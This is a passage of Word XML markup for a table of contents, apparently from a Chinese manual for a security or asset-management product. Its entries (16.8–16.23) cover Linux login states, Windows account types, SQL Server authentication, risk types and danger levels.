            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>468</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0752A81F" w14:textId="1A4D11B0" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166334" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.8 linux登录状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166334 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09085427" w14:textId="69EDA0A9" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166335" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.9 windows账号类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166335 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F911A10" w14:textId="4F81C2F9" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166336" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.10 linux账户登录方式</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166336 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CA18CA4" w14:textId="006F0DF6" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166337" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.11 linux交互登录方式</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166337 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C9D2539" w14:textId="614636BE" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166338" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.12 jar包类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166338 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33A9FE02" w14:textId="6C0A7A26" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166339" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.13 iis站点状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166339 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B8267C6" w14:textId="3C21DCDC" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166340" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.14 平台类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166340 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>471</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74D3D09F" w14:textId="33FE1EB8" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166341" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.15 系统类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166341 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>471</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CF75EB7" w14:textId="5C81C22C" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166342" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.16 linux默认启动模式</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166342 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>471</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38F99588" w14:textId="7B3A7A60" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166343" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.17 windows启动类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166343 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59EA5068" w14:textId="2FF7F5A4" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166344" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.18 linux任务类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166344 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D1B82FF" w14:textId="5EE2A8F1" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166345" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.19 linux安装包类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166345 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="737D229C" w14:textId="245BC456" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166346" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.20 windows SQL Server身份验证</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166346 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22A5C0CC" w14:textId="1AB25F28" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166347" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.21 windows SQL Server审核级别</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166347 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>473</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BE20AFB" w14:textId="75DB93F0" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166348" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.22 风险类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166348 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>473</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39CC13DA" w14:textId="51AC9050" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166349" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.23 危险程度</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
